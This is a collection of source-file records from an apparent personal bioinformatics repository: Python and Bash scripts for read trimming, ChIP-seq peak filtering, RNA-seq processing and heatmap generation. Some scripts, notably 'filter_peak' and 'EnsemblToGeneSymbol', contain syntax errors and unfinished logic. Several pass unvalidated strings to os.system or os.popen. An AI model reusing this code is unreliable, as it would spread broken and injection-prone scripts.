"text": "#!/nethome/yezhang_zhu/miniconda2/bin/python\n\nimport sys\n\nif len(sys.argv) < 5:\n\tprint(\"Usage:trim <raw_data> <clean_data> <start> <end>\")\n\texit(0)\n\ninfile=sys.argv[1]\n\noutfile=sys.argv[2]\n\nstart=int(sys.argv[3])\n\nend=int(sys.argv[4])\n\nloc=1\n\noutput=open(outfile,'w')\nwith open(infile) as fi:\n\tfor line in fi.readlines():\n\t\tif loc%2==0:\n\t\t\tline1=line.strip()\n\t\t\toutput.write(''.join(line1[start:end])+'\\n')\n\t\telse:\n\t\t\toutput.write(line)\n\t\tloc+=1\n"
},
{
"alpha_fraction": 0.6226415038108826,
"alphanum_fraction": 0.6566037535667419,
"avg_line_length": 15.625,
"blob_id": "69188a7149eca62bbaef358f25c4b6f750efa6dd",
"content_id": "762ae0b93c2f9d4ee005d9944bb769884a764dd4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 265,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 16,
"path": "/cost_time",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n#read -p \"please input your command: \" command\n\nif [ $# -lt 1 ];then\necho \"Need 1 parameters! <bash_file>\"\nexit\nfi\n\nbegin_time2=$(date +%s)\n\nbash $1\n\nend_time2=$(date +%s)\ncost_time2=$((end_time2 - begin_time2))\necho \"$command cost $cost_time2 seconds\""
},
{
"alpha_fraction": 0.6216216087341309,
"alphanum_fraction": 0.6685364842414856,
"avg_line_length": 35.314815521240234,
"blob_id": "9dca023ab12db9988968d8bc200d056b7209da3a",
"content_id": "e34028e8e93f4970631e0ba633a366b088cee03c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1961,
"license_type": "no_license",
"max_line_length": 194,
"num_lines": 54,
"path": "/batch_peak_filter_single",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nif [ $# -lt 3 ];then\necho \"Need 3 parameters! <control_sample> <IP_sample> <peaklist>\"\nexit\nfi\n\nEXTEND=200\n\ncontrol_sample=$1\nsamtools sort ${control_sample}.bam ${control_sample}.sorted\ncontrol_bam=$(echo \"${control_sample}.sorted\")\nbamToBed -i ${control_bam}.bam | extend_single ~/tools/ucsc_tools/mm9.chrom.sizes |sort -k1,1 -k2,2n > ${control_sample}.bed\n\ncontrol_mappable_read_count=$(samtools view -F 0x0004 ${control_bam}.bam | wc -l)\ncontrol_total_read_count=$(samtools view ${control_bam}.bam | wc -l)\n\necho \"${control_bam}.bam has ${control_mappable_read_count} mappable reads and ${control_total_read_count} total reads.\"\n\nIP_sample=$2\nsamtools sort ${IP_sample}.bam ${IP_sample}.sorted\nIP_bam=$(echo \"${IP_sample}.sorted\")\nIP_mappable_read_count=$(samtools view -F 0x0004 ${IP_bam}.bam | wc -l) \nIP_total_read_count=$(samtools view ${IP_bam}.bam | wc -l)\n\necho \"${IP_bam}.bam has ${IP_mappable_read_count} mappable reads and ${IP_total_read_count} total reads.\"\n\nbamToBed -i ${IP_bam}.bam | extend_single ~/tools/ucsc_tools/mm9.chrom.sizes |sort -k1,1 -k2,2n > ${IP_sample}.bed\n\npeakfile=$3\n\ncoverageBed -a ${IP_sample}.bed -b ${peakfile} | awk -v OFS='\\t' -v SIZE=$IP_mappable_read_count '{print $1,$2,$3,($6*1000000/SIZE)*1000/($3-$2)}' > ${IP_sample}.peaks.IP.rpkm.bdg\necho \"1\"\n#for file in E14input2i E14-input-S\n#do\n# controls=controls''$file','\n#done\n\ncoverageBed -a ${control_sample}.bed -b ${peakfile} | awk -v OFS='\\t' -v SIZE=$control_mappable_read_count '{print $1,$2,$3,($6*1000000/SIZE)*1000/($3-$2)}' > ${IP_sample}.peaks.control.rpkm.bdg\n\necho \"2\"\n\npaste ${IP_sample}.peaks.IP.rpkm.bdg ${IP_sample}.peaks.control.rpkm.bdg | awk -v OFS='\\t' '{\n\tif($8==\"0\") {\n\t\tratio=10;dRPKM=$4\n\t} \n\telse {\n\t\tratio=$4/$8;dRPKM=$4-$8\n\t}; \n\tif(ratio>2 && dRPKM>0.5 && $8<5) {print $1,$2,$3,ratio,dRPKM}\n}' > ${IP_sample}.ratio2.dRPKM0.5.filtered.uniq.peaks.bed\n\nwc -l ${peakfile}\nwc -l ${IP_sample}.ratio2.dRPKM0.5.filtered.uniq.peaks.bed\n"
},
{
"alpha_fraction": 0.638107419013977,
"alphanum_fraction": 0.6572890281677246,
"avg_line_length": 22,
"blob_id": "322e232b6e68f7c9aaad37abc684ad7a0aefcee8",
"content_id": "e68a8aeaad7c0d13d954335ae60ef4417db4d3ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 782,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 34,
"path": "/get_gene_from_expression",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/nethome/yezhang_zhu/miniconda2/bin/python\n\nimport sys\nimport os\n\nif len(sys.argv)<5:\n\tprint(\"Usage:get_gene_from_expression genelist expression_table outputfile unmapped_genelist\")\n\texit(0)\n\ndicts={}\ni=0\nwith open(sys.argv[1]) as infile:\n\tfor line in infile.readlines():\n\t\ti+=1\n\t\tline=line.strip()\n\t\tdicts[line]=1\nprint(\"There are \"+str(i)+\" genes.\")\nprint(str(len(dicts.keys()))+\" genes unique.\")\n\noutfile=open(sys.argv[3],'w')\noutfile2=open(sys.argv[4],'w')\n\nmapped_count=0\nfor i in dicts.keys():\n\toutline=os.popen(\"grep -i \\'\\\\b\"+i+\"\\\\b\\' \"+sys.argv[2]).read().strip()\n\t#print(\"grep \\'\\\\b\"+i+\"\\\\b\\' \"+sys.argv[2])\n\t#print(outline)\n\tif not outline=='':\n\t\toutfile.write(outline+'\\n')\n\t\tmapped_count+=1\n\telse:\n\t\toutfile2.write(i+\"\\n\")\n\nprint(\"find \"+str(mapped_count)+\" genes.\")\n"
},
{
"alpha_fraction": 0.6397515535354614,
"alphanum_fraction": 0.6552795171737671,
"avg_line_length": 22,
"blob_id": "44e7d29a8ea26231815b0e8b9eef93503cccd876",
"content_id": "8db20fcfc825303e799058faa0f800482787d697",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 644,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 28,
"path": "/get_heatmapr_cluster",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/nethome/yezhang_zhu/miniconda2/bin/python\n\nimport sys\n\nif len(sys.argv)<2:\n\tprint('Usage:get_heatmapr_cluster <peak_cluster>')\n\texit(0)\n\ndicts={}\nwith open(sys.argv[1]) as infile:\n\tfor line in infile.readlines():\n\t\tline=line.strip()\n\t\tline_split=line.split('\\t')\n\t\tif line.startswith('class'):\n\t\t\tpass\n\t\telse:\n\t\t\tif line_split[0] in dicts.keys():\n\t\t\t\tdicts[line_split[0]].append('\\t'.join(line_split[1:]))\n\t\t\telse:\n\t\t\t\tdicts[line_split[0]]=['\\t'.join(line_split[1:])]\ninfile.close()\n\nfor i in dicts.keys():\n\toutfile=sys.argv[1]+'_'+i\n\twith open(outfile,'w') as outfile:\n\t\tfor lines in dicts[i]:\n\t\t\toutfile.write(lines+'\\n')\n\toutfile.close()\n"
},
{
"alpha_fraction": 0.6108512878417969,
"alphanum_fraction": 0.6342375874519348,
"avg_line_length": 20.3799991607666,
"blob_id": "f989a7d7cf43bc38af827a0ffcec7ebb610799f7",
"content_id": "657457509a4c91b4ec2f3d2396df5564d0e02557",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1069,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 50,
"path": "/EnsemblToGeneSymbol",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/nethome/yezhang_zhu/miniconda2/bin/python\n\nimport mygene\nimport sys\nimport threading\n\nif len(sys.argv)<3:\n\tprint('Usage:EnsemblToGeneSymbol <Ensembl id list> <gene symbol>')\n\texit(0)\n\n#out=mg.query('PERM1',fields=['go','name','uniprot'],species='human')\n\nmg=mygene.MyGeneInfo()\n\noutfile=open(sys.argv[2],'w')\nmyout=[]\n\ndef getsymbol(line):\n\toutline=line\n line=line.strip()\n line_split=line.split('\\t')\n try:\n \tout=mg.query(line_split[0],fields='symbol',species='human') \n \t\tout2=mg.query(line_split[1],fields='symbol',species='human')\n\t\toutline=line+'\\t'+out['hits'][0]['symbol']+'\\t'+out2['hits'][0]['symbol']+'\\n'\n except:\n pass\n myout.append(outline)\n\n\nwith open(sys.argv[1]) as infile:\n\tthreads=[]\n\ti=0\n\tfor line in infile.readlines():\t\n\t\tt=threading.Thread(target=getsymbol,args=(line,))\n\t\tthreads.append(t)\n\t\ti+=1\n\t\tif i==100000:\n\t\t\tfor t1 in threads:\n\t\t\t\tt1.setDaemon(True)\n\t\t\t\tt1.start()\n\t\t\tt1.join()\n\t\t\tthreads=[]\n\t\t\ti=0\n\nfor line in myout:\n\toutfile.write(line)\n\ninfile.close()\noutfile.close()\n"
},
{
"alpha_fraction": 0.6485280990600586,
"alphanum_fraction": 0.6610169410705566,
"avg_line_length": 21.420000076293945,
"blob_id": "8bd88e125e0f821c928cb7b6b9749c975b818f68",
"content_id": "ef8262084bd1a77baf0ba4b0364031832d984a91",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1121,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 50,
"path": "/siteproBW_h",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/nethome/yezhang_zhu/miniconda2/bin/python\n\nimport time\nimport sys\nimport re\nimport os\n\nif len(sys.argv)<3:\n\tprint(\"Usage:heatmapr_h <bedfilelist> <wigfilelist> <advanced_parameter>\")\n\nparameter=''\nif len(sys.argv)>3:\n\tparameter=' '.join(sys.argv[3:])\n\n\nbedfiles=[]\ntitles=[]\nwith open(sys.argv[1]) as bedfile:\n\tfor i in bedfile.readlines():\n\t\ti=i.strip()\n\t\tif re.findall('\\t',i):\n\t\t\tbedfiles.append(i.split('\\t')[0])\n\t\t\ttitles.append(i.split('\\t')[1])\n\t\telse:\n\t\t\tbedfiles.append(i)\n\t\t\ttitles.append(i)\nbedfile.close()\n\nwigfiles=[]\nsubtitles=[]\nwith open(sys.argv[2]) as wigfile:\n\tfor i in wigfile.readlines():\n\t\ti=i.strip()\n\t\tif re.findall('\\t',i):\n\t\t\twigfiles.append(i.split('\\t')[0])\n\t\t\tsubtitles.append(i.split('\\t')[1])\n\t\telse:\n\t\t\twigfiles.append(i)\n\t\t\tsubtitles.append(i)\nwigfile.close()\n\nbedfiles_str=' -b '.join(bedfiles)\nsubtitles_str=' -l '.join(titles)\n\nfor i in range(len(wigfiles)):\n\ttry:\n\t\tsystem_str='siteproBW -l '+subtitles_str+' --name='+wigfiles[i]+' -w '+wigfiles[i]+' -b '+bedfiles_str+' --span 3000 '+parameter+' &'\n\t\tos.system(system_str)\n\texcept:\n\t\tprint('Error during heatmapr.Skip this one.')\n"
},
{
"alpha_fraction": 0.6863836050033569,
"alphanum_fraction": 0.7017569541931152,
"avg_line_length": 32.485294342041016,
"blob_id": "ea59dedfaa21a0b63750d463880144cd98229016",
"content_id": "25f89d9579e87298c461957632580d80fcb2e1d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6830,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 204,
"path": "/!filter_peak",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/nethome/yezhang_zhu/miniconda2/bin/python\n\nimport re\nimport sys\nimport math\n\ndef read_peaks(peaks_filename):\n\tprint(\"reading peaks file...\")\n\tpeak_dicts={}\n\twith open(peaks_filename) as peaks_in:\n\t\tfor line in peaks_in.readlines():\n\t\t\tchrom=line.split('\\t')[0]\n\t\t\tstart=int(line.split('\\t')[1])\n\t\t\tend=int(line.split('\\t')[2])\n\t\t\tif chrom in peak_dicts.keys():\n\t\t\t\tpeak_dicts[chrom].append((start,end))\n\t\t\telse:\n\t\t\t\tpeak_dicts[chrom]=[]\n\tpeaks_in.close()\n\treturn peak_dicts\n\ndef read_wig(wiggle_filename):\n\tprint(\"reading wiggle file...\")\n\twig_dicts={}\n\twith open(wiggle_filename) as wig_in:\n\t\ttemp_chrom=''\n\t\tfor line in wig_in.readlines():\n\t\t\tif line.startswith(\"track\"):\n\t\t\t\tpass\n\t\t\tif re.findall(\"chrom\",line):\n\t\t\t\tchrom=re.search(\"chrom\\=(\\S+)\",line).group(1)\n\t\t\t\ttemp_chrom=chrom\n\t\t\t\twig_dicts[chrom]={}\n\t\t\telse:\n\t\t\t\tline=line.strip()\n\t\t\t\tposition=int(line.split('\\t')[0])\n\t\t\t\tscore=float(line.split('\\t')[1])\n\t\t\t\twig_dicts[temp_chrom][position]=score\n\twig_in.close()\n\treturn wig_dicts\n\ndef read_bdg(bdg_filename):\n\tprint(\"reading bedgraph file...\")\n\twig_dicts={}\n\twith open(bdg_filename) as wig_in:\n\t\tfor line in wig_in.readlines():\n\t\t\tline=line.strip()\n\t\t\tchrom=line.split('\\t')[0]\n\t\t\tif not chrom in wig_dicts.keys():\n\t\t\t\twig_dicts[chrom]={}\n\t\t\tposition=int(int(line.split('\\t')[1])+int(line.split('\\t')[2])*0.5)\n\t\t\tscore=float(line.split('\\t')[-1])\n\t\t\t#print(chrom,position,score)\n\t\t\twig_dicts[chrom][position]=score\n\twig_in.close()\n\treturn wig_dicts\n\ndef output_peak(survive_peak_dicts,outfilename):\n\tchrom_list=sorted(survive_peak_dicts.keys())\n\toutfile=open(outfilename,'w')\n\tloc=0\n\tfor chrom in chrom_list:\n\t\tout_list=survive_peak_dicts[chrom]\n\t\tfor (peak_start,peak_end) in out_list:\n\t\t\toutfile.write(chrom+'\\t'+str(peak_start)+'\\t'+str(peak_end)+'\\tpeak_'+str(loc)+'\\n')\n\t\t\tloc+=1\n\toutfile.close()\n\ndef remove_FP_all(peak_dicts,wig_dicts,wig_dicts_treat,outfilename):\n\toutfile_dicts={}\n\tfor chrom in peak_dicts.keys():\n\t\tpeak_list_for_chrom=remove_FP_chrom(peak_dicts[chrom],wig_dicts[chrom],wig_dicts_treat[chrom],chrom)\n\t\toutfile_dicts[chrom]=peak_list_for_chrom\n\toutput_peak(outfile_dicts,outfilename)\n\ndef remove_FP_chrom(peak_list,wig_dicts_dicts,wig_dicts_dicts_treat,chrom):\n\tpeak_list_out=[]\n\twig_postion=sorted(wig_dicts_dicts.keys())\n\twig_dicts_list=sorted(wig_dicts_dicts.items(),key=lambda item:item[0])\n\tposition_dicts=mk_index(wig_postion)\n\n\twig_postion_treat=sorted(wig_dicts_dicts_treat.keys())\n\twig_dicts_list_treat=sorted(wig_dicts_dicts_treat.items(),key=lambda item:item[0])\n\tposition_dicts_treat=mk_index(wig_postion_treat)\n\n\tfor (peak_start,peak_end) in peak_list:\n\t\ttry:\n\t\t\tpositions_core=find_position(peak_start,peak_end,position_dicts)\n\t\t\tpositions_treat_core=find_position(peak_start,peak_end,position_dicts_treat)\n\t\t\tscores_core={}\n\t\t\tscores_treat_core={}\n\t\t\tfor loc in positions_core:\n\t\t\t\tscores_core[loc]=wig_dicts_dicts[loc]\n\t\t\tfor loc in positions_treat_core:\n\t\t\t\tscores_treat_core[loc]=(wig_dicts_dicts_treat[loc]\n\t\t\tsubmit=int((peak_start+peak_end)*0.5)\n\t\t\tpeak_start_2=submit-3000 if submit>3000 else 1\n\t\t\tpeak_end_2=submit+3000\n\t\t\tpostions_all=find_position(peak_start_2,peak_end_2,position_dicts)\n\t\t\tpositions_treat_all=find_position(peak_start_2,peak_end_2,position_dicts_treat)\n\t\t\tscores_all={}\n\t\t\tscores_treat_all={}\n\t\t\tfor loc in positions_all:\n\t\t\t\tscores_all[loc]=wig_dicts_dicts[loc]\n\t\t\tfor loc in positions_treat_all:\n\t\t\t\tscores_treat_all[loc]=wig_dicts_dicts_treat[loc]\n\t\t\tpositons_except=[for i in positions_all if not in positions_core]\n\t\t\t\n\t\t\t#print(scores_treat)\n\t\t\t#rate,mianji,minus_control=compare(positions,scores)\n\t\t\t#rate_treat,mianji_treat,minus_treat=compare(positions,scores)\n\t\t\t#if rate_treat<=0.85 and mianji_treat>2*mianji:\n\t\t\t#\tpeak_list_out.append((peak_start,peak_end))\n\t\t\t#else:\n\t\t\t#\tpass\n\t\texcept:\n\t\t\tprint(\"Can not find...\")\n\t\t\tprint(chrom,peak_start,peak_end)\n\treturn peak_list_out\n\ndef compare(position_list,score_list):\n\tmianji=0\n\tfor i in range(len(position_list)-1):\n\t\tmianji=mianji+float((position_list[i+1]-position_list[i])*(score_list[i]+score_list[i+1])*0.5)\n\tmax_mian=float(position_list[-1]-position_list[0])*max(score_list)\n\tmin_mian=float(position_list[-1]-position_list[0])*min(score_list)\n\trate=float(mianji)/max_mian\n\tmianji_minus=max_mian-min_mian\n\treturn rate,mianji,mianji_minus\n\ndef mk_index(wig_postion):\n\tposition_dicts={}\n\tnumber=int(math.sqrt(len(wig_postion)))\n\tfor i in range(0,len(wig_postion),number):\n\t\tposition_dicts[wig_postion[i]]=wig_postion[i:i+number]\n\treturn position_dicts\n\ndef find_position(peak_start,peak_end,position_dicts):\n\tindex_list=sorted(position_dicts.keys())\n\tstart_index=0\n\tstart_index_f=0\n\tend_index=0\n\tend_index_f=0\n\tfor i in range(len(index_list)-1):\n\t\tif index_list[i]<=peak_start and index_list[i+1]>peak_start:\n\t\t\tstart_index=index_list[i]\n\t\t\tstart_index_f=index_list[i+1]\n\t\t\tbreak\n\t\telse:\n\t\t\tstart_index=index_list[-1]\n\t\t\tstart_index_f=index_list[-1]\n\tfor i in range(len(index_list)-1):\n\t\tif index_list[i]<=peak_end and index_list[i+1]>peak_end:\n\t\t\tend_index=index_list[i]\n\t\t\tend_index_f=index_list[i+1]\n\t\t\tbreak\n\t\telse:\n\t\t\tend_index=index_list[-1]\n\t\t\tend_index_f=index_list[-1]\n\tif start_index == end_index:\n\t\tstart_list=search_index(start_index,peak_start,position_dicts,1,1)\n\t\tend_list=search_index(end_index,peak_end,position_dicts,0,0)\n\t\tpostion_list = [val for val in start_list if val in end_list]\n\telse:\n\t\tif peak_start-start_index <= start_index_f-peak_start:\n\t\t\tstart_list=search_index(start_index,peak_start,position_dicts,1,1)\n\t\telse:\n\t\t\tstart_list=search_index(start_index,peak_start,position_dicts,1,0)\n\t\tif peak_end-end_index <= end_index_f-peak_end:\n\t\t\tend_list=search_index(end_index,peak_end,position_dicts,0,1)\n\t\telse:\n\t\t\tend_list=search_index(end_index,peak_end,position_dicts,0,0)\n\t\tpostion_list=start_list.extend(end_list)\n\treturn postion_list\n\ndef search_index(wig_position_index,peak_positon,wig_position_dicts,flag_start_end,flag_zf):\n\tsearch_field=wig_position_dicts[wig_position_index]\n\tif flag_zf==1:\n\t\tfor i in range(len(search_field)-1):\n\t\t\tif search_field[i] <= peak_positon and search_field[i+1] > peak_positon:\n\t\t\t\tif flag_start_end==1:\n\t\t\t\t\treturn search_field[i:]\n\t\t\t\telse:\n\t\t\t\t\treturn search_field[:i+1]\n\tif flag_zf==0:\n\t\tfor i in range(len(search_field)-1,0,-1):\n\t\t\tif search_field[i] >= peak_positon and search_field[i-1] < peak_positon:\n\t\t\t\tif flag_start_end==1:\n\t\t\t\t\treturn search_field[i-1:]\n\t\t\t\telse:\n\t\t\t\t\treturn search_field[:i]\n\ndef main(file1,file2,file3,file4):\n\tpeak_dicts=read_peaks(file1)\n\twig_dicts_dicts_control=read_bdg(file2)\n\twig_dicts_dicts_treat=read_bdg(file3)\n\tremove_FP_all(peak_dicts,wig_dicts_dicts_control,wig_dicts_dicts_treat,file4)\n\nif __name__ == '__main__':\n\tif len(sys.argv)<5:\n\t\tprint(\"Usage:filter_peak peak.bed control.wig treat.wig outfile\")\n\t\texit(0)\n\telse:\n\t\tmain(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4])"
},
{
"alpha_fraction": 0.5280373692512512,
"alphanum_fraction": 0.5467289686203003,
"avg_line_length": 28.18181800842285,
"blob_id": "a634313707a662fdd1d69cd5bcbfce18f751d7f1",
"content_id": "108c3ec1b5bf31ae4d0dc58c58660f141a73fb11",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 642,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 22,
"path": "/cat_peaks_macs2",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/nethome/yezhang_zhu/miniconda2/bin/python\n\nimport sys\n\nif len(sys.argv)<3:\n print(\"Usage:cat_peaks_bed_macs2 <peaks.xls> <outfile>\")\n exit(0)\n\noutfile=open(sys.argv[2],'w')\nwith open(sys.argv[1]) as peak_xls:\n for line in peak_xls.readlines():\n if line.startswith(\"#\") or line=='\\n':\n pass\n else:\n line=line.strip()\n line_split=line.split('\\t')\n if line_split[0] == 'chr':\n pass\n else:\n outfile.write(line_split[0]+'\\t'+line_split[1]+'\\t'+line_split[2]+'\\t'+line_split[-1]+'\\t'+line_split[8]+'\\n')\npeak_xls.close()\noutfile.close()\n"
},
{
"alpha_fraction": 0.6324999928474426,
"alphanum_fraction": 0.6575000286102295,
"avg_line_length": 21.27777862548828,
"blob_id": "500a900e9604cfcaacd2d62f7e386892e2cb82f3",
"content_id": "b12ec3f827eea7b665e5f76f55d0260ccb83db6e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 400,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 18,
"path": "/merge_bed",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/nethome/yezhang_zhu/miniconda2/bin/python\n\nimport sys\ni=1\nlist=[]\nfor line in sys.stdin.readlines():\n\tline=line.strip()\n\tline_split=line.split('\\t')\n\tif i%2==0:\n\t\tlist.append(int(line_split[1]))\n\t\tlist.append(int(line_split[2]))\n\t\tchrom=line_split[0]\n\t\tprint(chrom+'\\t'+str(min(list))+'\\t'+str(max(list)))\n\t\tlist=[]\t\n\telse:\n\t\tlist.append(int(line_split[1]))\n\t\tlist.append(int(line_split[2]))\n\ti+=1"
},
{
"alpha_fraction": 0.6522449254989624,
"alphanum_fraction": 0.6620408296585083,
"avg_line_length": 23.019607543945312,
"blob_id": "3a76c015e5d31094499e7da0ce384cac620b1871",
"content_id": "da947f82675089a0d84209181281125364b57146",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1225,
"license_type": "no_license",
"max_line_length": 225,
"num_lines": 51,
"path": "/heatmapr_h",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/nethome/yezhang_zhu/miniconda2/bin/python\n\nimport sys\nimport re\nimport os\n\nif len(sys.argv)<4:\n\tprint(\"Usage:heatmapr_h <bedfilelist> <wigfilelist> <advanced_parameter>\")\n\texit(0)\n\nparameter=''\nif len(sys.argv)>4:\n\tparameter=' '.join(sys.argv[4:])\n\nhmethod=sys.argv[3]\n\nbedfiles=[]\ntitles=[]\nwith open(sys.argv[1]) as bedfile:\n\tfor i in bedfile.readlines():\n\t\ti=i.strip()\n\t\tif re.findall('\\t',i):\n\t\t\tbedfiles.append(i.split('\\t')[0])\n\t\t\ttitles.append(i.split('\\t')[1])\n\t\telse:\n\t\t\tbedfiles.append(i)\n\t\t\ttitles.append(i)\nbedfile.close()\n\nwigfiles=[]\nsubtitles=[]\nwith open(sys.argv[2]) as wigfile:\n\tfor i in wigfile.readlines():\n\t\ti=i.strip()\n\t\tif re.findall('\\t',i):\n\t\t\twigfiles.append(i.split('\\t')[0])\n\t\t\tsubtitles.append(i.split('\\t')[1])\n\t\telse:\n\t\t\twigfiles.append(i)\n\t\t\tsubtitles.append(i)\nwigfile.close()\n\nwigfiles_str=','.join(wigfiles)\nsubtitles_str=','.join(subtitles)\n\nfor i in range(len(bedfiles)):\n\ttry:\n\t\tsystem_str='heatmapr --name='+titles[i]+' --method '+hmethod+' --subtitle='+subtitles_str+' --x_label='+subtitles_str+' --y_label='+subtitles_str+' --wig='+wigfiles_str+' -b '+bedfiles[i]+' --title='+titles[i]+' '+parameter\n\t\tos.system(system_str)\n\texcept:\n\t\tprint('Error during heatmapr.Skip this one.')\n"
},
{
"alpha_fraction": 0.647311806678772,
"alphanum_fraction": 0.6645161509513855,
"avg_line_length": 18.375,
"blob_id": "21275c13fa77f987e6623f40e6ea17f11a69c4ed",
"content_id": "4b20b28cb3ab0cf7c11165d7dab7a58c5ce8ffea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 465,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 24,
"path": "/subtract_0",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/nethome/yezhang_zhu/miniconda2/bin/python\n\nimport sys\nimport re\n\nif len(sys.argv)<3:\n\tprint(\"Usage:subtract_0 <wigfile_input> <wigfile_output>\")\n\texit(0)\n\noutfile=open(sys.argv[2],'w')\nwith open(sys.argv[1]) as infile:\n\tfor line in infile.readlines():\n\t\tline=line.strip()\n\t\tif re.findall('chrom',line):\n\t\t\toutfile.write(line+'\\n')\n\t\telse:\n\t\t\ts=float(line)\n\t\t\tif s<0:\n\t\t\t\toutfile.write('0\\n')\n\t\t\telse:\n\t\t\t\toutfile.write(line+'\\n')\n\noutfile.close()\ninfile.close()\n"
},
{
"alpha_fraction": 0.6619915962219238,
"alphanum_fraction": 0.6891070604324341,
"avg_line_length": 24.464284896850586,
"blob_id": "91028c79009342670ecb3d9b1cdafb39316fb5b8",
"content_id": "c35ee0da32ec70e8db48b11de384e612e918e9a7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2143,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 84,
"path": "/rna-seq_pipeline",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nif [ $# -lt 3 ];then\necho \"Need 3 parameters! <start_position> <end_positon> <Species>\"\nexit\nfi\n\nstart_p=$1\nend=$2\n\necho \"start_postion=${start_p}\"\necho \"end_posiotion=${end}\"\n\nif [ \"$3\" != \"mm9\" -a \"$3\" != \"hg19\" ];then\necho \"Species:mm9/hg19\"\nexit\nfi\n\nif [ \"$3\" = \"mm9\" ];then\nGTF=/nethome/Shared/annotation/iGenome/Mus_musculus/UCSC/mm9/Annotation/Genes/genes.gtf\nGENOME_FA=/nethome/Shared/annotation/iGenome/Mus_musculus/UCSC/mm9/Sequence/Bowtie2Index/genome.fa\nGENOME=/nethome/Shared/annotation/iGenome/Mus_musculus/UCSC/mm9/Sequence/Bowtie2Index/genome\nelse\nGENOME_FA=/nethome/Shared/annotation/genomes/hg19/Sequence/Bowtie2Index/genome.fa\nGENOME=/nethome/Shared/annotation/genomes/hg19/Sequence/Bowtie2Index/genome\nGTF=/nethome/Shared/annotation/genomes/hg19/Annotation/Genes/genes.gtf\nfi\n\nfor file in `ls *R1*.fastq`\ndo \n{\ntrim ${file} ${file%%_*}_1.fastq $start_p $end \ntrim ${file/R1/R2} ${file%%_*}_2.fastq $start_p $end \n} &\ndone\nwait\n\n\nfor file in `ls *_1.fastq`\ndo\noutdir=${file%_*}_tophat\ntophat -o ${outdir} --no-coverage-search --no-novel-juncs -p 16 -G ${GTF} ${GENOME} ${file} ${file%%_1.fastq}_2.fastq \n#mkdir ${outdir}\n#bowtie2 -p 16 -x $GENOME -1 $file -2 ${file/_1/_2} -S ${outdir}/${outdir}.sam 2>&1|tee ${outdir}/${outdir}.align.log\ndone\n\n#if [ -f \"assembly.txt\" ]; then \n# rm assembly.txt\n#fi \n\n#touch assembly.txt\n\n#for filedir in `ls -F | grep 'tophat/$'`\n#do\n#outdir=${filedir%/*}_cufflinks\n#echo ${outdir}\"/transcripts.gtf\" >> assembly.txt\n#cufflinks -p 16 -G $GTF -o ${outdir} ${filedir}accepted_hits.bam\n#done\n\n#cuffmerge -g $GTF -o cuffmerge_out -p 16 assembly.txt\n\n#GTF_merged=cuffmerge_out/merged.gtf\n\nfor filedir in `ls -F | grep 'tophat/$'`\ndo\noutdir=${filedir%%/}_cuffquant\ncuffquant -o ${outdir} -p 16 -u $GTF ${filedir}accepted_hits.bam\ndone\n\nfiles2=\"\"\nlabel=\"\"\nfor file in `ls -F | grep '_cuffquant/$'`\ndo\nlabel=${label}${file%%_*}\",\"\nfiles2=${files2}${file}\"abundances.cxb \"\ndone\n\nlabel=${label%,*}\n\ncuffnorm -p 12 --labels ${label} --library-norm-method=classic-fpkm -o cuffnorm_table $GTF ${files2}\n\nmkdir tophat cufflinks cuffquant\nmv *_tophat/ tophat\nmv *_cuffquant/ cuffquant\n"
},
{
"alpha_fraction": 0.588850200176239,
"alphanum_fraction": 0.7317073345184326,
"avg_line_length": 56.400001525878906,
"blob_id": "3808eb574c191e7de6547e029ca6d3fb0101d1ab",
"content_id": "93e2e440b83db05800596540ce5b0a52bf1e850f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 287,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 5,
"path": "/download.sh",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
